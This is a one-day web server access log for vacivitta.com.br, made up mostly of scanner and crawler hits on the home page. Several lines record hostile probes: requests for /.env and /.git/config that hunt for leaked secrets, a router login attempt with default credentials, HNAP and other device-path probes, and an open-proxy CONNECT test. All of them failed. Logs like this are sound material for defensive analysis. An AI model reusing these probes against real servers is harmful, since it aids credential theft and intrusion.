vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:44:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:44:47 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:44:50 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:44:54 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:45:08 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:45:13 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
206.168.34.69 - - [15/Apr/2025:04:45:15 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:05:01:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:05:19:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
169.211.214.179 - - [15/Apr/2025:05:22:36 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:05:42:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:05:43:08 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:05:43:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:05:51:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:05:53:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:05:55:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
162.243.203.144 - - [15/Apr/2025:05:58:34 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
162.243.203.144 - - [15/Apr/2025:05:58:34 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
3.142.93.7 - - [15/Apr/2025:06:09:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
3.142.93.7 - - [15/Apr/2025:06:11:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
3.142.93.7 - - [15/Apr/2025:06:15:31 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
3.142.93.7 - - [15/Apr/2025:06:16:25 -0300] "\n" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:06:16:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
3.142.93.7 - - [15/Apr/2025:06:17:01 -0300] "SSH-2.0-Go" 404 - "-" "-"
vacivitta.com.br:80
3.142.93.7 - - [15/Apr/2025:06:18:02 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
2.58.56.157 - - [15/Apr/2025:06:19:44 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
148.113.206.49 - - [15/Apr/2025:06:28:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:06:39:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
65.49.1.43 - - [15/Apr/2025:07:02:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)"
vacivitta.com.br:80
65.49.1.51 - - [15/Apr/2025:07:04:59 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
vacivitta.com.br:80
65.49.1.38 - - [15/Apr/2025:07:05:25 -0300] "GET /geoserver/web/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:07:08:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:07:09:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:07:19:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
172.212.224.28 - - [15/Apr/2025:07:22:06 -0300] "GET /portal/redlion HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
80.82.77.202 - - [15/Apr/2025:07:30:39 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:07:34:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
162.216.150.226 - - [15/Apr/2025:07:46:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:07:53:54 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:07:56:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:08:02:23 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:08:04:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:08:22:46 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:08:34:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:08:47:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:08:53:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [15/Apr/2025:09:10:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:09:11:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:09:24:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:09:25:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
172.236.233.65 - - [15/Apr/2025:09:37:08 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
172.236.233.65 - - [15/Apr/2025:09:38:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) AppleWebKit/605.1.15 (KHTML"
vacivitta.com.br:80
172.236.233.65 - - [15/Apr/2025:09:38:32 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) AppleWebKit/605.1.15 (KHTML"
vacivitta.com.br:80
172.236.233.65 - - [15/Apr/2025:09:38:41 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
172.236.233.65 - - [15/Apr/2025:09:38:52 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
172.236.233.65 - - [15/Apr/2025:09:38:53 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:09:53:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:10:08:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:10:14:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:10:28:39 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:10:37:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:10:41:51 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.91.127.81 - - [15/Apr/2025:10:53:22 -0300] "CONNECT pro.ip-api.com:443 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:10:59:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:11:27:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:11:33:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:11:39:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [15/Apr/2025:11:39:43 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) konqueror/4.14.10 Safari/537.21"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:11:44:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.230.66.45 - - [15/Apr/2025:11:46:44 -0300] "POST /HNAP1/ HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
198.235.24.238 - - [15/Apr/2025:12:00:07 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:12:03:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:12:28:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:12:54:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:12:55:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:12:59:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [15/Apr/2025:13:24:29 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:13:24:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:13:29:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:13:41:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:13:46:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:13:47:58 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:13:51:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:14:13:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [15/Apr/2025:14:23:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:14:34:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:14:44:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [15/Apr/2025:14:47:44 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
vacivitta.com.br:80
93.174.93.12 - - [15/Apr/2025:14:49:09 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
182.120.61.18 - - [15/Apr/2025:14:52:19 -0300] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:14:54:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:14:59:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:15:17:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:15:31:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:15:47:57 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:16:01:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:16:08:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
148.113.206.49 - - [15/Apr/2025:16:09:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:16:13:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:16:22:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
114.9.19.50 - - [15/Apr/2025:16:44:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:16:44:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:17:05:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
3.16.50.110 - - [15/Apr/2025:17:06:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
3.16.50.110 - - [15/Apr/2025:17:06:46 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
3.16.50.110 - - [15/Apr/2025:17:06:46 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
3.16.50.110 - - [15/Apr/2025:17:06:47 -0300] "SSH-2.0-Go" 404 - "-" "-"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:17:07:17 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
3.16.50.110 - - [15/Apr/2025:17:07:45 -0300] "\n" 404 - "-" "-"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:17:09:07 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
172.245.241.123 - - [15/Apr/2025:17:15:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0"
vacivitta.com.br:80
147.185.132.64 - - [15/Apr/2025:17:20:45 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:17:24:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:17:24:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
178.175.134.70 - - [15/Apr/2025:17:26:56 -0300] "GET /activate/ HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:17:35:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:17:47:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:18:09:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
194.156.102.137 - - [15/Apr/2025:18:14:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
180.149.126.5 - - [15/Apr/2025:18:18:11 -0300] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:18:26:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
